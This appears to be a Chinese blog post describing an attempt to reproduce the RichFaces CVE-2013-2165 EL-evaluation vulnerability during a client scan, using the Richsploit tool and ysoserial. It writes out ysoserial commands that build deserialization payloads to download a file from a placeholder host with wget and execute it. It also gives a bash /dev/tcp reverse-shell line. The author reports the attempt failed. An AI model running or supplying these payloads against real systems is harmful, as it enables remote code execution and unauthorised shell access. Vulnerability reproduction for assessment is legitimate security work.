1. 程式人生 > 實用技巧 >RF-14310: Arbitrary EL Evaluation | Arbitrary EL Evaluation in RichFaces | CVE-2013-2165 復現

RF-14310: Arbitrary EL Evaluation | Arbitrary EL Evaluation in RichFaces | CVE-2013-2165 復現

緣起

今天給客戶做掃描,掃描器掃到一個漏洞

但這個漏洞是好久之前的,按照大佬的文章去復現,發現官方啥的都不提供下載了,而我自己java比較垃圾,就想著不復現了,直接copy個POC來用就行,但是遇到了一些問題

都是自己菜導致的,算了過程都不說了,直接看結果吧
首先redtimmy是釋出了利用工具的https://github.com/redtimmy/Richsploit
我們把工具下載下來

然後用IDEA開啟(可以用學生郵箱白嫖一年的使用權)


要匯入這個包要不然用不了????不匯入好像也行

好的我們要執行這個檔案, path這個路徑填的檔名..(下面說哪來的)

path這個路徑填的檔名是用工具生成的,github直接搜尋ysoserial

就能搜到

先用ysoserial生成相關payload
java -jar ysoserial-0.0.5-SNAPSHOT-all.jar CommonsCollections5 "/usr/bin/wget -O /tmp/reverseshell http://x.x.x.x/reverseshell" > payload1.bin
java -jar ysoserial-0.0.5-SNAPSHOT-all.jar CommonsCollections5 "/bin/bash /tmp/reverseshell" > payload2.bin
reverseshell裡面可以這樣寫: /bin/bash -c '/bin/bash -i >/dev/tcp/x.x.x.x/xxxx 2>&1'

緣滅

然後執行指令碼生成payload
把payload拼接到/DATA/後面即可

好可惜啊,我這個竟然沒反應,大佬說返回500說明程式碼執行成功了,我怎麼怎麼慘,祝福大家都有好運氣

參考連結:
給我莫大幫助的大佬:

其他參考連結:

https://vnprogramming.com/index.php/2016/10/10/web500-hitconctf-2016-and-exploit-cve-2013-2165/